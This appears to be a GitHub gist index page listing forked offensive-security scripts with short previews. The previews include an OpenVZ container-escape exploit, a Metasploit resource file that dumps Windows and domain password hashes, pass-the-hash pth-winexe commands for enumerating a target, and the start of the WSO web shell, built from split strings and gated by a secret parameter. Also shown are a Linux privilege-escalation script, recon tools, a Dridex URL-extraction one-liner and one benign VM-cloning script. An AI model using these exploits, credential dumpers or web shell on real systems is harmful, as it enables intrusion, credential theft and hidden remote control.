Bart Black reanimat0r
reanimat0r
/ bind_test.sh
Created
October 28, 2018 21:19
— forked from mak/bind_test.sh
escape from openvz container to underlying fs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ### for ref goto: http://seclists.org/oss-sec/2015/q2/38 | |
| ## sanity checks | |
| if (( $(id -u) )); then echo '[-] need root'; exit; fi | |
| if [ ! -e /proc/vz ]; then echo '[-] this is not openvz based'; exit; fi | |
| if [ ! -e /dev/simfs ]; then echo '[-] no smifs cant exploit'; exit; fi | |
| a=$(mktemp -d /bind_XXXXXXX) |
reanimat0r
/ gist:63a4f2335745610fd1d9fc43b03fa943
Created
October 28, 2018 21:23
— forked from mak/gist:cb6cd183550bdb853c2d
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| thisvm=$1 | |
| thatvm=$2 | |
| # You cannot "clone" a running vm, stop it. suspend and destroy | |
| # are also valid options for less graceful cloning | |
| virsh shutdown ${thisvm} |
reanimat0r
/ gist:4dd356854d2be1c0ddd7c6065ba03e93
Created
October 28, 2018 21:25
— forked from mak/gist:8102226fa35993954249
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| get_dridex_patebin() { echo "http://pastebin.com/download.php?i$(cat $1 | grep --binary-files=text -Pzo "Content-Type: application/x-mso\r?\n(.*\r?\n)*\r?\n------=_N" | head -n-2 | grep -v mso | tr -d "\n\r" | base64 -d | dd if=/dev/stdin bs=1 skip=50 2>/dev//null| openssl zlib -d | python2 oledump.py -s a -v | grep 'i?php.daolnwod/moc.nibetsap//:p'| cut -d'+' -f3 | cut -d'"' -f2 | rev)" ; } |
reanimat0r
/ gist:842d6e603afdb1ee5272856ddaf99ee9
Created
October 28, 2018 21:27
— forked from mak/gist:2d617cf150195db3b0c4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| get_dridex_patebin() { echo "http://pastebin.com/download.php?i$(cat $1 | grep --binary-files=text -Pzo "Content-Type: application/x-mso\r\n(.*\r\n)*\r\n------=_N" | head -n-2 | grep -v mso | tr -d "\n\r" | base64 -d | dd if=/dev/stdin bs=1 skip=50 2>/dev//null| openssl zlib -d | python2 oledump.py -s a -v | grep 'i?php.daolnwod/moc.nibetsap//:p'| cut -d'+' -f3 | cut -d'"' -f2 | rev)" ; } |
reanimat0r
/ Sn1per v4.4 (Beta)
Created
October 28, 2018 21:58
— forked from 1N3/Sn1per v4.4 (Beta)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # + -- --=[Sn1per by 1N3@CrowdShield | |
| # + -- --=[http://crowdshield.com | |
| # | |
| VER="4.4" | |
| BROWSER="firefox" # SET DEFAULT BROWSER | |
| INSTALL_DIR="/usr/share/sniper" | |
| PLUGINS_DIR="/usr/share/sniper/plugins" | |
| CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py" |
reanimat0r
/ crt.sh
Created
October 28, 2018 21:59
— forked from 1N3/crt.sh
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # crt.sh sub-domain check by 1N3@CrowdShield | |
| # https://crowdshield.com | |
| # | |
| OKBLUE='\033[94m' | |
| OKRED='\033[91m' | |
| OKGREEN='\033[92m' | |
| OKORANGE='\033[93m' |
reanimat0r
/ LinuxPrivEsc.sh
Created
October 28, 2018 22:00
— forked from 1N3/LinuxPrivEsc.sh
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| # `7MN. `7MF' | |
| # __, MMN. M | |
| #`7MM M YMb M pd""b. | |
| # MM M `MN. M (O) `8b | |
| # MM M `MM.M ,89 | |
| # MM M YMM ""Yb. | |
| #.JMML..JML. YM 88 | |
| # (O) .M' |
reanimat0r
/ metasploit-post-exploitation-script-for-windows.rc
Created
October 28, 2018 22:00
— forked from 1N3/metasploit-post-exploitation-script-for-windows.rc
Metasploit Post Exploitation Script For Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setg SESSION 1 | |
| use post/windows/gather/smart_hashdump | |
| run | |
| use post/windows/gather/credentials/domain_hashdump | |
| run | |
| use post/windows/gather/credentials/mcafee_vse_hashdump | |
| run | |
| use post/windows/gather/credentials/mssql_local_hashdump | |
| run | |
| use post/windows/gather/hashdump |
reanimat0r
/ windows-post-exploitation.sh
Created
October 28, 2018 22:02
— forked from 1N3/windows-post-exploitation.sh
A Windows post exploitation shell script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| TARGET=$1 | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view" |
reanimat0r
/ wso_2.5_shell.php
Created
October 28, 2018 22:04
— forked from 1N3/wso_2.5_shell.php
WSO 2.5 Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ'])) | |
| { | |
| $a1="Fil"; | |
| $c1="#d"; | |
| $c2="f5"; | |
| $color = $c1.$c2; | |
| $bs="esM"; | |
| $da="an"; | |
| $default_action = $a1.$bs.$da; |